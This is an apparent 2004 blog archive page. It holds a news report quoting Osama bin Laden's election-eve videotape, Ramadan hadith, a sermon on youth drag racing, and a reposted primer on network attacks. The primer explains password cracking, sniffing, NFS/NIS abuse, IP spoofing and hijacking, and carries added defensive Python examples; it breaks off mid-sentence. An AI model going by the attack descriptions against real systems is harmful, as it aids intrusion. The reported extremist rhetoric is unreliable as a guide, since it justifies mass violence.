Sunday, October 31, 2004

Who wants some dishoom?

"Sorry for the music, but it's very funny."

Osama Bin Laden Warns America

Osama bin Laden, injecting himself into the campaign four days ahead of presidential elections, said in a videotape aired Friday that the United States can avoid another Sept. 11 attack if it stops threatening the security of Muslims.

In the segment broadcast, the al Qaeda leader refrained from directly threatening new attacks, although he said "there are still reasons to repeat what happened."

"Your security is not in the hands of (Democratic presidential nominee John) Kerry, (U.S. President George W.) Bush or al Qaeda. Your security is in your own hands," bin Laden said. "Any state that does not mess with our security, has naturally guaranteed its own security."

Admitting for the first time that he ordered the Sept. 11 attacks, bin Laden said he did so because of injustices against the Lebanese and Palestinians by Israel and the United States.

Bin Laden said he wanted to explain why he ordered the suicide airline hijackings that hit the World Trade Center and the Pentagon so Americans would know how to act to prevent another attack.

"To the American people, my talk is to you about the best way to avoid another Manhattan," he said. "I tell you: Security is an important element of human life and free people do not give up their security."

It was the first footage in more than a year of the fugitive al Qaeda leader, thought to be hiding in the mountains along the Pakistan-Afghanistan border. The video, broadcast on Al-Jazeera television, showed bin Laden with a long gray beard, wearing traditional white robes, a turban and a golden cloak, standing behind a table with papers and in front of a plain, brown curtain.

His hands were steady and he appeared healthy.

The Bush administration said Friday it believes the videotape was authentic and had been made recently. Bush said Friday that "Americans will not be intimidated" by bin Laden.

The U.S. was given a copy of the bin Laden tape several hours before it aired, so intelligence analysts have had time to study it, reports CBS News National Security Correspondent David Martin. Emergency video conferences were set in motion all over Washington to assess what the tape meant and how the U.S. should react to it.

The timing of the tape suggests bin Laden is trying to influence the U.S. election -- much as the Madrid train bombings last March apparently led to the defeat of Spain's pro-U.S. prime minister, Martin reports.

One of the first things that struck analysts about the tape was bin Laden's appearance -- well groomed, well dressed, and warm, reports Martin. It was a far cry from the noticeably haggard man seen on a tape released in December of 2001. That tape spurred speculation bin Laden had been wounded in the bombing of Tora Bora. But this latest tape shows a man gesturing naturally with both hands and giving no obvious sign of disability. It puts an end to any debate about whether bin Laden is alive.

A U.S. official in Washington said the entire tape was 18 minutes, lacked an explicit threat and repeated well-worn themes.

Al-Jazeera broadcast about seven minutes of the tape. The station's spokesman, Jihad Ali Ballout, said they aired what was "newsworthy and relevant" and refused to describe the unaired portions, including whether they included any threats.

Al-Jazeera, based in Qatar, did not say how it had received the tape. The channel has previously broadcast audio and video tapes from members of al Qaeda.

There was no way to determine exactly when the tape was made — but it offered evidence that bin Laden was alive and following events. Kerry emerged as the Democratic candidate in the spring.

In Florida, Kerry said all Americans are united against bin Laden, adding he would "stop at absolutely nothing to hunt down, capture or kill the terrorists wherever they are, whatever it takes, period."

Bin Laden accused President Bush of misleading Americans by saying the attack was carried out because al Qaeda "hates freedom." Bin Laden said his followers have left alone countries that do not threaten Muslims.

"We fought you because we are free ... and want to regain freedom for our nation. As you undermine our security we undermine yours," he said.

He said he was first inspired to attack the United States by the 1982 Israeli invasion of Lebanon in which towers and buildings in Beirut were destroyed in the siege of the capital.

"While I was looking at these destroyed towers in Lebanon, it sparked in my mind that the tyrant should be punished with the same and that we should destroy towers in America, so that it tastes what we taste and would be deterred from killing our children and women," he said.

"God knows that it had not occurred to our mind to attack the towers, but after our patience ran out and we saw the injustice and inflexibility of the American-Israeli alliance toward our people in Palestine and Lebanon, this came to my mind," he said.

Bin Laden suggested Bush was slow to react to the Sept. 11 attacks, giving the hijackers more time than they expected. At the time of the attacks, the president was listening to schoolchildren in Florida reading a book, an incident to which bin Laden referred.

"It never occurred to us that the commander-in-chief of the American armed forces would leave 50,000 of his citizens in the two towers to face these horrors alone," he said, referring to the number of people who worked at the World Trade Center.

In planning the attacks, bin Laden said he told Mohammed Atta, one of the hijackers, that the strikes had to be carried out "within 20 minutes before Bush and his administration noticed." Instead, bin Laden said, his operatives had three times that period.

Bin Laden also said the Bush administration was like repressive Arab regimes "in that half of them are ruled by the military and the other half are ruled by the sons of kings and presidents."

Montasser el-Zayat, a Cairo lawyer who defends Islamic radicals, said the video amounted to an "unprecedented attack on Bush at a very critical time, before the U.S. elections," and also served as proof bin Laden was alive and at large.

In elections after March 11 bombings in Spain blamed on al Qaeda, Jose Maria Aznar was defeated. The Spanish bombings came just before the vote, killed 191 people and were seen as revenge for Aznar's support of the Iraq war despite his citizens' opposition. The new Socialist leaders who defeated Aznar withdrew Spain's troops from Iraq after taking office in April.

On Web sites devoted to extremist Muslim comment, contributors reacted with glee to the tape, saying it was proof bin Laden was alive and a "slap" at America.

The image of bin Laden reading a statement was dramatically different from the few other videos of the al Qaeda leader that have emerged since the Sept. 11 attacks.

In the last videotape, issued Sept. 10, 2003, bin Laden is seen walking through rocky terrain with his top deputy Ayman al-Zawahri, both carrying automatic rifles. In a taped message issued at the same time, bin Laden praises the "great damage to the enemy" on Sept. 11 and mentions five hijackers by name.

In December 2001, the Pentagon released a videotape in which bin Laden is shown at a dinner with associates in Afghanistan on Nov. 9, 2001, saying the destruction of the Sept. 11 attacks exceeded even his "optimistic" calculations.

But in none of his previous messages, audio or video, did bin Laden directly state that he ordered the attacks.

The last audiotape purportedly from bin Laden came in April. The speaker on the tape, which CIA analysts said likely was the al Qaeda leader, offered a truce to European nations if they pull troops out of Muslim countries. The tape referred to the March 22 assassination by Israel of Hamas founder Sheik Ahmed Yassin.

Al-Zawahri, bin Laden's Egyptian deputy, has spoken on three recent audiotapes that emerged on June 11, Sept. 9 and Oct. 1 this year. In the latest, he called on young Muslims to strike the United States and its allies.

Fasting in Ramadan; a shield from Hell

Arfajah said "We were with `Utbah Ibn Farqad while he was discussing Ramadan. A companion of the Prophet entered upon the scene. When `Utbah saw him, he became shy and stopped talking. The man (the companion) spoke about Ramadan, saying "I heard the Messenger of Allah say during Ramadan: 'The gates of Hell are closed, the gates of Paradise are opened, and the devils are in chains. An angel calls out : 'O you who intend to do good deeds, have glad tidings. O you who intend to do evil, refrain, until Ramadan is completed.''" (Ahmad and an-Nasa'i)

The Messenger of Allah (p.b.u.h.) said : "When Allah created Paradise and Hell-fire, He sent Jibreel (Gabriel) to Paradise, saying: 'Look at it and at what I have prepared therein for its inhabitants.' The Prophet (p.b.u.h.) said: 'So he came to it and looked at it and at what Allah had prepared therein for its inhabitants.' The Prophet (p.b.u.h.) said: 'So he returned to Him and said: 'By your glory, no one hears of it without entering it.' So He ordered that it be encompassed by forms of hardship, and He said: 'Return to it and look at what I have prepared therein for its inhabitants.'' The Prophet (p.b.u.h.) said: 'So he returned to it and found that it was encompassed by forms of hardship. Then he returned to Him and said: 'By Your glory, I fear that no one will enter it.' He said: 'Go to Hell-fire and look at it and what I have prepared therein for its inhabitants,' and he found that it was in layers, one above the other. Then he returned to Him and said: 'By Your glory, no one who hears of it will enter it.' So He ordered that it be encompassed by lusts (or desires). Then He said: 'Return to it.' And he returned to it and said: 'By Your glory, I am frightened that no one will escape from entering it.''' (at-Tirmithi and al-Hakim among others).

Therefore, when you know, O Dear Brother/Sister, that fasting subdues the desires and reduces their severity, and that it is these desires and lusts that lead to Hell Fire, then you will see how fasting comes between a fasting person and Hell Fire and you will rush to fast in Ramadan and after Ramadan in the best possible way.

The Holy Quran rather talks about the reward of fasting, and there are verses whose general meaning implies that those who obey Allah will be saved from Hell, and fasting is a form of obeying Allah. We will leave the verses that talk about the reward to the section related to Paradise. However, the Ahadith of our beloved Prophet Mohammad (p.b.u.h.) are clear in this regard:

Abu Sa'eed al-Khudri reported that the Messenger of Allah, said: "No servant fasts on a day in the path of Allah except that Allah removes the Hell Fire seventy years further away from his face." (Bukhari and Muslim)

Abu Sa'eed al-Khudri relates that the Messenger of Allah (p.b.u.h.) said : "Fasting is a shield with which a servant protects himself from the Fire" (Ahmad, Sahih)

`Uthman Ibn Abil-`Aas relates that the Messenger of Allah (p.b.u.h.) said : "Whoever fasts a day in the way of Allah, Allah places between him and the Fire a trench like that between heavens and the earth". (at-Tirmithi and at-Tabarani, Sahih)

Abu Huraira narrated that Allah's Messenger (p.b.u.h.) said : "When the month of Ramadan starts, the gates of the heaven are opened and the gates of Hell are closed and the devils are chained." (Bukhari)

The Messenger of Allah (p.b.u.h.) said : "When it is the first night of Ramadan the evil devils are chained. The gates of Fire are locked- not a single gate is opened, and the gates of Paradise are opened- not a single gate is locked, and a caller calls out: 'O seeker of good come forward, and O seeker of evil withhold, and there are many whom Allah frees from the Fire - and that is every night. (at-Tirmithi, Ibn Majah, and Ibn Khuzaimah: Hasan)

Abu Hurayrah reported that the Prophet (p.b.u.h.) climbed upon the mimbar (pulpit) and said: "Aameen (O Allah grant it), aameen, aameen". So it was said, 'O Messenger of Allah, you climbed upon the mimbar and said: 'aameen, aameen, aameen'? So he said: 'Jibraa'eel, `alaihi assalam, came to me and said, 'Whoever reaches the month of Ramadan and does not have (his sins) forgiven and so enters Fire, then may Allah distance him, say aameen'. So I said 'aameen''". (Ibn Khuzaimah, Ahmad and al-Bayhaqi: Sahih)

Jabir (May Allah be pleased with him) relates that the Messenger of Allah (p.b.u.h.) said: "In every day and every night, during the month of Ramadan, there are people to whom Allah grants freedom from the Fire, and there is for every Muslim a supplication which he can make and will be granted". (al-Bazzaar, Ahmad and Ibn Majah: Sahih)

In the famous Hadith of Mu`ath, I said: "O Messenger of Allah, tell me of an act which will take me into Paradise and keep me away from Hell-Fire. He said: 'You have asked me about a major matter, yet it is easy for him for whom Allah Almighty makes it easy. You should fast in Ramadan.' Then he (the Prophet) said: 'Shall I not show you the gates of goodness? Fasting is a shield.'" (at-Tirmithi)

We pray to Allah to make for us this Ramadan a shield from Hell Fire.

Source: www.ramadan.ws

Friday, October 29, 2004

Drag Racing in Ramadhaan

By Shaykh Afzal Ismail

In the last few days a number of emails have come to us explaining the despicable condition of our Muslim youth in places like Lenasia where an environment of drag racing has become the 'in thing'. With shock and hurt we have decided to write a few words in the hope that Muslims out there would take heed to the Islamic voice and take action to prevent the condition from worsening.

In Ramadhaan when Allah's mercy and forgiveness is descending it is almost unthinkable that Muslim youth are on the streets pompously racing their fancy cars, blowing their sound systems with deafening Satanic music and hanging out with boyfriends and girlfriends.

This is not unique to Lenasia. Many a Muslim community is faced with the problem of youth loitering at shopping malls, restaurants and in the parking lots of Masjids during Taraweeh. How unfortunate that when the words of Allah are being recited Muslims find greater pleasure in other activities!

This is not only a public disturbance to the local community but an open insult to Islam. The implication is that Muslims cannot be tamed by even the most auspicious month of their calendar!

The harms and sin of this need no explanation. What we need to tackle is why this has come about and how do we prevent it.

The Cause

1. Parents

Muslim parents have to accept a major portion of the blame. Parents need to realize that giving cash, cellphones, cars and other material things to their children does not prove their love for them. Many youth and children are not mature enough to understand how to use these things in a responsible manner.

The Prophet Sallallahu Alaihi Wasallam said : "No father can give a better gift to his children than good manners and good character." (Tirmidhi)

Children need parents to give them their love, their advice, their Islamic knowledge and their time. Parents who live through their children's youthful years making money, travelling on business trips and showing little regard for Islamic teachings in their family setup end up having to deal with a terrible mess in the form of disobedient children, drug addiction and divorce in their very own homes.

Islam teaches a long term solution. Parents are to live with their children through their days of happiness and sadness providing support and encouragement. This may bring less income into the family but more happiness, contentment and stability.

2. The Media

The movie and television industry has brainwashed our children's minds from a tender age into believing that lights, jingles, fancy cars, music, dating and dressing to kill bring happiness. The opening ceremonies of sporting events, the Oscars, actors' profiles, etc. all have the stench of breeding arrogance and extravagance in their followers. This arrogance, coupled with all the other negative qualities which are beamed out from the movies, rubs off onto the youth.


The Solution

Quick Solution

Parents need to keep a tight check on their children's movements.

Children should accompany their parents to Taraweeh and measures should be taken in every Masjid that children do not slip out during Taraweeh.

Daughters should never be allowed to leave their homes at night.

Muslim owned restaurants need to be closed during Taraweeh. No Muslim in his right state of mind can enjoy the extra profits earned during Taraweeh from Muslim customers who want to escape from the beautiful environment of the Masjid.

Long Term Solution

Parents should develop their spirituality to the level that this spirituality rubs off onto their children and family. Parents whose lives revolve around Salaah, recitation of Quran, Da'wah, community work and good morals bring up children who are mature and responsible. Parents who are spiritually weak and show little concern for Islamic teachings bring up children who are gangsters and recluses. This is a general reality which we can relate to in our own experiences.

Youth need to be convinced that the fast life of moving with fancy cars, loud music, funky dress, cell phones, etc do not prove that one is good or successful. American and Western youth have tasted of this life and it has destroyed them completely. Why should Muslim youth want to follow in their footsteps? Islam teaches that successful are those youth who are attached to the Masjid and whose lives are adorned with good character.

Each and every Muslim who has the concern of Muslim youth at heart should make dua to Allah to eradicate our communities of such behaviour. May Allah bring peace, goodness and morality into our homes and communities. Aameen!

Convert this email into action

1. Print copies of this article and give them to your children to spread them in school and Madrasah

2. Print and read at the Iftaar table in your home

3. Print and ask school and Madrasah teachers to read to their students

4. Print and leave them in public places, shops, etc

5. Forward this article to all on your mailing list

6. Forward your ideas and suggestions to info@muslimsatwork.co.za on the problem and how to overcome it.




General Attack Descriptions

By security-protocols.com

Article pulled from Security-Protocols


Until a few years ago Internet security wasn't even recognized as a need.
The culture of the Internet encouraged the sharing of data and ideas; the
common goals of Internet users made boundaries and restrictions
unnecessary--or so it seemed to many at the time.

Originally, the people on the Internet were the people who built the
Internet, but as time passed and the Internet became more useful and more
reliable, they were joined by other people at their companies and
universities--and then by other companies and universities. With fewer
common goals and more people, the Internet became a much more dangerous
place. Although various sorts of mischief were quite common, these incidents
got little publicity, and most people who thought of computer security
problems at all assumed that such problems involved teenagers breaking into
banks with modems.

The Internet Worm changed all that. In November of 1988 the Internet linked
about 60,000 computers, and a good many of them found themselves under
attack. Even those not affected by the Worm still had to be checked and
rechecked to be sure they were safe from infection. Estimates of the total
price tag for the incident are in the hundreds of millions of dollars.

The Worm was the first Internet security incident to hit the nightly news.
People who had been working in obscurity suddenly found TV camera crews in
their machine rooms. The issue was no longer whether you needed to secure
your computer systems--it was how you were going to secure them.

In the years since the Worm, there has been an explosion in Internet
usage--and a corresponding explosion in new types of Internet attacks.
Consider a few recent reports from the front:

* Over the years, computational physicist and computer security
researcher Tsutomu Shimomura of the San Diego Supercomputer Center has
accumulated an invaluable archive of security tools and documentation
of system security holes. On Christmas Day 1994 an intruder copied the
files from his archive. Two days later Shimomura received a voice mail
message, bragging about the intrusion and threatening his life.
Shimomura reacted aggressively by setting up stealth monitoring posts
and tracking the intruder's further break-ins at telephone company
switching centers, companies like Apple and Motorola, the Well, and
Netcom (from which the intruder copied 20,000 credit card account
numbers). Shimomura concluded that the intruder was computer criminal
Kevin Mitnick, who had been sought for years by law enforcement. After
an intensive hunt conducted with the cooperation of the FBI and local
telephone companies, Mitnick was tracked down in Raleigh, North
Carolina.

* In the fall of 1994 two writers, Josh Quittner and Michelle Slatalla,
were the target of an "electronic mail bomb", apparently in retaliation
for an article on the cracker community they'd published in Wired
magazine. Someone broke into IBM, Sprint, and the writers' network
provider and modified programs so their email and telephone service was
disrupted. A flood of email messages so overwhelmed their network
service that other messages couldn't get through; eventually their
Internet connection was shut down entirely. Their phone service also
fell victim to the intruders, who reprogrammed things so that callers
were routed to an out-of-state number where they heard an obscene
recording.

* More and more sites are falling victim to password sniffers. The CERT
(Computer Emergency Response Team) reports that as many as 100,000
sites were targeted by password sniffers in 1994. (We'll explain what
sniffers do later in this article.)

Insidious attacks like these have made computer security one of the most
pressing problems facing Internet users in this decade. O'Reilly &
Associates' line of computer security books looks closely at the risks of
using the Internet and the measures you can take to reduce these risks.

Internet Risks

What kinds of security risks do you take on the Internet? Here's a sampling:

Password Attacks

Some years ago, before the Worm raised our consciousness about security
risks, it was almost laughably easy for intruders to break into almost any
system. Many sites didn't use passwords at all, or offered guest or admin
passwords that users could share. Users who did have their own passwords
routinely chose passwords that could be easily guessed (the names of their
children or pets, their birth dates, their license plates). Because nobody
bothered to encrypt files, an intruder who broke into the system could then
invade almost anybody's files, take a copy of the /etc/passwd file, and
later run it through a password cracking program that quickly revealed the
passwords of other users in the system. Once deciphered, these purloined
passwords became bartering chips among underground groups that shared
technical information about product vulnerabilities and site-specific
security holes.

Most systems and users have tightened up their security in the wake of the
Internet Worm. Guest and admin passwords have become rarer, but password
security as a whole is still laughable in most places. Group accounts
abound, and invariably at least 10 percent of the passwords users select are
poor (the only way to make them better is to install a password program that
forces good passwords). Readily available password dictionaries, cracking
programs, and password sniffing combine to make passwords very vulnerable.

How can you avoid password attacks? Educate the users on your system so they
pick better passwords. Consider using system-generated passwords or, better
still, stronger types of authentication, such as one-time (nonreusable)
passwords.

Password Sniffing Attacks

The recent wave of password sniffing attacks on the Internet makes the
strength of your passwords almost irrelevant.

How does password sniffing work? In many network setups, it is possible for
any machine on a given network to hear the traffic for every machine on that
network. This is true for most Ethernet-based networks, and Ethernet is by
far the most common local area networking technology in use today. This
characteristic of Ethernet is especially dangerous because most of the
protocols in use today are unencrypted. As a result, the data sent and
received is there for anybody to snoop on. This data includes files accessed
via network file systems, passwords sent to remote systems during Telnet,
FTP, and rlogin sessions, electronic mail sent and received, and so on.

A password sniffer is a program that takes advantage of this characteristic
to monitor all of the IP (Internet Protocol) traffic on its part of the
network. By capturing the first 128 bytes of every FTP or Telnet session,
for example, password sniffers can easily pick up your user name and
password as you type them. Password sniffers may use programs provided for
network debugging as building blocks, or may be written to use the services
directly. Special-purpose password sniffing toolkits are widely available to
attackers.

The danger of password sniffing attacks is in their rapid spread. Favorite
targets for sniffers are network providers and public access systems where
the volume of Telnet and FTP connections is huge. One sniffer on large
public access systems can collect thousands of sniffed account names and
passwords, and then compromise every system accessed. Even if your systems
are as secure as possible and your user passwords are not guessable, you can
be infected by a packet sniffer running at any site that your users can log
in from, or at any site their packets will cross to get to you.

Password sniffing can happen anywhere. Many people make the mistake of
assuming that because they're using a well-known, commercial service, there
is no danger in remotely accessing their own machines across the network. In
fact, the commercial services are prime targets, and most of them are
periodically compromised. In any case, a connection may cross a large number
of intermediate networks, which each represent unknown risks. How can you
avoid being sniffed? In general, you can't and still provide remote network
access. If your password ever passes across a network which might be
insecure--electronically or physically--it is likely to be captured. What
you can do is ensure that an intruder who gets your password can't use it.
One-time (nonreusable) passwords are probably the most effective way. Using
a freely available program like Bellcore's S/Key may not keep your passwords
from being viewed, but because these passwords are used only once, it
doesn't really matter if they are seen.
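Why a sniffed one-time password is useless to the person who captured it follows from how a hash chain like S/Key's works. The example below is added here and is not S/Key itself or code from the original article: S/Key proper uses MD4/MD5 and encodes 64-bit values as six short words, while this version uses SHA-256 digests sent as raw bytes (an assumption made to keep the code short). The secret, seed and chain length are constructed values.

```python
import hashlib

# Assumption: S/Key proper derives 64-bit values with MD4/MD5 and encodes them
# as six short words; this added example keeps the same hash-chain idea but
# uses SHA-256 digests and sends them as raw bytes.
HASH_NAME = "sha256"


def otp_hash(data: bytes) -> bytes:
    return hashlib.new(HASH_NAME, data).digest()


def chain_value(secret: str, seed: str, count: int) -> bytes:
    """H^count(seed || secret): `count` applications of the one-way hash."""
    x = (seed + secret).encode()
    for _ in range(count):
        x = otp_hash(x)
    return x


class OtpClient:
    """The user's side: knows the secret, recomputes each one-time password."""

    def __init__(self, secret: str):
        self.secret = secret

    def register(self, seed: str, n: int) -> bytes:
        return chain_value(self.secret, seed, n)      # H^n, handed to the server once

    def respond(self, count: int, seed: str) -> bytes:
        return chain_value(self.secret, seed, count)  # H^count, sent over the wire


class OtpServer:
    """The host's side: stores only the last accepted value, never the secret."""

    def __init__(self, seed: str, n: int, head: bytes):
        self.seed, self.counter, self.head = seed, n, head

    def challenge(self) -> tuple:
        # Sent in the clear, like S/Key's "otp-... 99 seed" prompt.
        return self.counter - 1, self.seed

    def verify(self, response: bytes) -> bool:
        if self.counter <= 1:
            return False                      # chain used up; user must re-register
        if otp_hash(response) != self.head:   # H(H^(k-1)) must equal the stored H^k
            return False
        self.head = response                  # advance the chain
        self.counter -= 1
        return True


def demo() -> dict:
    """One registration, two logins, and a sniffer replaying a captured password."""
    secret, seed, n = "correct horse", "ab12", 5   # constructed values
    client = OtpClient(secret)
    server = OtpServer(seed, n, client.register(seed, n))
    results = {}

    count, s = server.challenge()
    captured = client.respond(count, s)          # what a sniffer sees on the wire
    results["first_login"] = server.verify(captured)
    results["replay"] = server.verify(captured)  # same value again: rejected

    count, s = server.challenge()
    results["second_login"] = server.verify(client.respond(count, s))
    results["logins_left"] = server.counter - 1
    return results


if __name__ == "__main__":
    print(demo())
```

The value on the wire is H^(k-1); to log in next time the attacker would need H^(k-2), which requires inverting the hash. Replaying H^(k-1) fails because the server has already moved its stored head to that value, and the server file itself is of no use to a thief, since it holds neither the secret nor any value that will be accepted again.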

NFS and Other Data Service Attacks

A number of services exist to allow computers to share information with each
other and to allow users to move easily from computer to computer. These
services are an important part of the power of UNIX networks. Unfortunately,
they are often exploited by attackers, who convince these services to share
more information than intended or to share it with unintended recipients.
Often this occurs because designers were concerned with local area network
access and did not realize that services might also be available across wide
area networks to other organizations.

The Network File System (NFS) and Network Information Service (NIS) are
notoriously easy ways to attack a system. NFS allows systems to share files
over a network by letting a client mount a disk on a remote server machine.
NIS maintains a distributed database of password tables, group files, host
tables, and other information that systems on a network can share. Many
sites choose not to support NIS at all, and some avoid even NFS. However,
these services are not a problem if they are run in a protected environment
(for example, behind a firewall).

If you haven't properly protected your site, an attacker may be able to
simply NFS-mount your filesystems. The way NFS works, client machines are
allowed to read and change files stored on the server without having to log
into the server or enter a password.

Because NFS doesn't log transactions, you might not even know that someone
has full access to your files.

NIS is most often used to distribute password information, and most
implementations of NIS provide absolutely no control over which machines can
request information. As long as an attacker can guess the name of your NIS
domain and can send an NIS request to your NIS server, that attacker can get
a full copy of your password information (including encrypted passwords),
even if you are running shadow passwords and the passwords are not in the
/etc/passwd file. The attacker is then free to crack your passwords at
leisure.

NFS, NIS, and other services have additional security vulnerabilities, both
obvious and not so obvious. For example, NFS has very weak client
authentication, and an attacker may be able to convince the NFS server that
a request is coming from a client that is permitted in the exports file (the
file that lets you specify which file systems can be mounted via NFS, and
which other machines can mount them). There are also situations in which an
attacker can hijack an existing NFS mount. (See the discussion of hijacking
attacks later in this article.)
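A quick way to find the "share more than intended" problem in NFS is to audit the exports file for file systems that are mountable by any host. The following is an added example, not the article's or any NFS implementation's code; it assumes the Linux exportfs syntax for /etc/exports (other NFS servers use other files and formats), and the sample file is constructed.

```python
import re

# Constructed sample /etc/exports in the Linux exportfs syntax (an assumption;
# other NFS servers use different files and formats).
SAMPLE_EXPORTS = """\
# home directories, restricted to one subnet and with remote root mapped away
/export/home     192.0.2.0/24(rw,root_squash)
# options but no client: exported read-write to any host on the Internet
/export/scratch  (rw)
# a wildcard client is "everyone" too
/export/src      *(ro)
# no client list at all: every host may mount it (read-only by default)
/export/pub
# a named client, but remote root becomes root on the server's files
/export/build    build1.example.com(rw,no_root_squash)
"""

CLIENT = re.compile(r"([^(]*)(?:\(([^)]*)\))?")


def parse_exports(text: str):
    """Yield (path, [(client, [options]), ...]) for each export line."""
    for line in text.splitlines():
        line = line.split("#", 1)[0].strip()    # drop comments and blank lines
        if not line:
            continue
        path, *rest = re.split(r"\s+", line, maxsplit=1)
        clients = []
        for token in (rest[0].split() if rest else []):
            m = CLIENT.fullmatch(token)
            host, opts = m.group(1), (m.group(2) or "")
            clients.append((host, [o for o in opts.split(",") if o]))
        yield path, clients


def audit_exports(text: str) -> list:
    """Return (path, problem) pairs for exports that share more than intended."""
    findings = []
    for path, clients in parse_exports(text):
        if not clients:
            findings.append((path, "no client list: any host may mount it"))
        for host, opts in clients:
            everyone = host in ("", "*")
            if everyone and "rw" in opts:
                findings.append((path, "read-write export to every host"))
            elif everyone:
                findings.append((path, "export to every host"))
            if "no_root_squash" in opts:
                findings.append((path, f"remote root on {host} is root here"))
    return findings


if __name__ == "__main__":
    for path, problem in audit_exports(SAMPLE_EXPORTS):
        print(f"{path}: {problem}")
```

Restricting exports to named clients only narrows the problem the article describes: because NFS trusts the client's claimed identity, the host list must be combined with a firewall that keeps NFS and portmapper traffic from the outside off the network entirely.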

Denial of Service Attacks

There are two classic types of denial of service attacks, both particularly
devastating when used on a network. Earlier in this article, we described an
"electronic mail bomb" that shut down service by flooding an email mailbox.
That's one type of denial of service--the same type performed by the
Internet Worm. What happens here is that an intruder so floods a system or
network--with messages, processes, or network requests--that no work can be
done. The system or network spends all its time responding to messages and
requests, and can't actually satisfy any of them.

In the other category of attack, equipment or services are completely shut
down or disabled. With ICMP attacks, which are becoming more common on the
Internet, an attacker sends an ICMP message to a host or router, telling it
to stop sending packets to all or part of the network.

How can you prevent denial of service attacks? The best defense against an
ICMP attack is to install a firewall that ignores or filters ICMP messages.

In general, though, denial of service attackers are tough to
prevent--electronically, as well as in real life. If you accept things from
the external world--electronic mail, telephone calls, or packages--it's
possible to get flooded. The famous college prank of ordering a pizza or two
from every pizzeria in town to be delivered to your least favorite person is
a form of denial of service. (It's hard to do much while arguing with 42
pizza deliverers.) In the electronic world, denial of service is as likely
to happen by accident as on purpose. (Have you ever had a persistent fax
machine try to fax something to your voice line?) The most important thing
is to set up services so that if one of them is flooded, the rest of your
site keeps functioning while you fix the problem.

Fortunately, denial of service attacks are not terribly popular. They're
easy enough to be unsporting; they tend to be simple to trace back--and
therefore risky to the attacker; and they don't provide the attacker with
the information or the ability to use your computers that is the payoff for
most other attacks. Intentional denial of service attacks are the work of
people who are angry at your site in particular--and at most sites, there
are very few such people.

IP Attacks

Attackers sometimes take advantage of a little-used option--the source
routing option--in the IP header of packets being sent across the Internet.
Even systems protected by firewalls have fallen victim to these types of
attacks.

Certain kinds of firewalls work by keeping packets from being routed from an
outside system into your internal network. In normal packet routing, packets
are routed in the most efficient way from source to destination. However, if
the source routing option is specified for a packet, it shows the particular
route that the packet is to follow. Unfortunately, turning off the regular
routing of packets from the Internet to an inside network doesn't turn off
the routing of source-routed packets on BSD systems. Attackers have
exploited this peculiarity and used it to penetrate systems that are
expecting their firewalls to keep all such outside packets out.

Another attack, which surfaced for the first time in early 1995, involves
attackers creating packets with false IP addresses. By exploiting
applications that use authentication based on IP addresses (such as the
so-called Berkeley "r" commands, which include rlogin, rsh, and rcp),
intruders have been able to gain access. Most of the attacks take advantage
of the ability of intruders to guess sequence numbers associated with
network connections and the acknowledgments passed between machines. These
attacks are technically tricky, because the intruder doesn't receive the
responses to the packets it sends; when they succeed, however, the payoff
for these attacks can be high. (The attack on Shimomura described earlier
was this type.)

How can you prevent these attacks? Firewalls are the only sufficient
defense. You want to look for packets on your external interface (that is,
packets coming from outside your internal network) that claim to have
internal source IP addresses and for packets that have source routes
specified. You can do this by installing an appropriately configured packet
filtering router. It's also best to avoid address-based authentication
completely, if you can.
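The two ingress checks just described, written out as an added Python example for this page (it is not code from the original article or from any router or firewall product): parse_ipv4_header() walks a raw IPv4 header and its option list, and ingress_verdict() drops a packet seen on the external interface if it carries a loose or strict source-route option (IP option types 131 and 137) or if its source address falls inside the site's own prefixes. The prefixes in INTERNAL_NETS, the build_ipv4() helper and the three sample headers are constructed for the example.

```python
"""Ingress checks: spoofed internal source addresses and IP source-route options.

Added example for this page; not from the original article or any firewall product.
"""
import ipaddress
import struct

# Address space behind the firewall. Constructed for the example; a real
# filter would list the site's own prefixes.
INTERNAL_NETS = [
    ipaddress.ip_network("10.0.0.0/8"),
    ipaddress.ip_network("192.168.0.0/16"),
]

# IPv4 option type codes: 131 = loose source and record route (LSRR),
# 137 = strict source and record route (SSRR).
SOURCE_ROUTE_OPTIONS = {131: "LSRR", 137: "SSRR"}


def parse_ipv4_header(packet: bytes):
    """Return (source, destination, [option type codes]) from a raw IPv4 header."""
    if len(packet) < 20:
        raise ValueError("truncated IPv4 header")
    version, ihl = packet[0] >> 4, (packet[0] & 0x0F) * 4
    if version != 4 or ihl < 20 or len(packet) < ihl:
        raise ValueError("not a well-formed IPv4 header")
    src = ipaddress.ip_address(packet[12:16])
    dst = ipaddress.ip_address(packet[16:20])
    options = []
    i = 20
    while i < ihl:
        kind = packet[i]
        if kind == 0:          # End of Option List
            break
        if kind == 1:          # No Operation: single byte, no length field
            i += 1
            continue
        if i + 1 >= ihl:
            raise ValueError("option missing its length byte")
        length = packet[i + 1]
        if length < 2 or i + length > ihl:
            raise ValueError("option length runs past the header")
        options.append(kind)
        i += length
    return src, dst, options


def ingress_verdict(packet: bytes):
    """Decide what to do with a packet arriving on the external interface."""
    src, dst, options = parse_ipv4_header(packet)
    for kind in options:
        if kind in SOURCE_ROUTE_OPTIONS:
            return "DROP", f"{SOURCE_ROUTE_OPTIONS[kind]} option present, source {src}"
    if any(src in net for net in INTERNAL_NETS):
        return "DROP", f"external packet claims internal source {src}"
    return "ACCEPT", f"{src} -> {dst}"


def build_ipv4(src: str, dst: str, options: bytes = b"") -> bytes:
    """Build a minimal IPv4 header (protocol TCP, no payload) as sample input."""
    options += b"\x00" * (-len(options) % 4)      # pad options to 32-bit words
    ihl = 5 + len(options) // 4
    fixed = struct.pack("!BBHHHBBH4s4s",
                        (4 << 4) | ihl, 0, 20 + len(options), 0, 0, 64, 6, 0,
                        ipaddress.ip_address(src).packed,
                        ipaddress.ip_address(dst).packed)
    return fixed + options


def sample_packets():
    """Constructed samples: a spoofed internal source, an LSRR packet, a clean packet."""
    lsrr = b"\x83\x07\x04" + ipaddress.ip_address("10.0.0.5").packed  # type 131, len 7, ptr 4
    return {
        "spoofed": build_ipv4("192.168.1.7", "203.0.113.10"),
        "source_routed": build_ipv4("198.51.100.4", "203.0.113.10", lsrr),
        "clean": build_ipv4("198.51.100.4", "203.0.113.10"),
    }


if __name__ == "__main__":
    for name, pkt in sample_packets().items():
        print(f"{name:14s} {ingress_verdict(pkt)}")
```

The option walk stops at an End of Option List byte and rejects a length that runs past the header, so a malformed option list raises rather than being silently accepted; a real packet filter applies the same two rules per interface, with the "internal source" test only on the outside-facing one.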

Hijacking Attacks

Another emerging Internet threat involves the hijacking of any open terminal
or login session from users on the system. Once intruders have root access
on a system, they use a tool that lets them dynamically modify the UNIX
kernel. This allows them to take over terminal connections after any
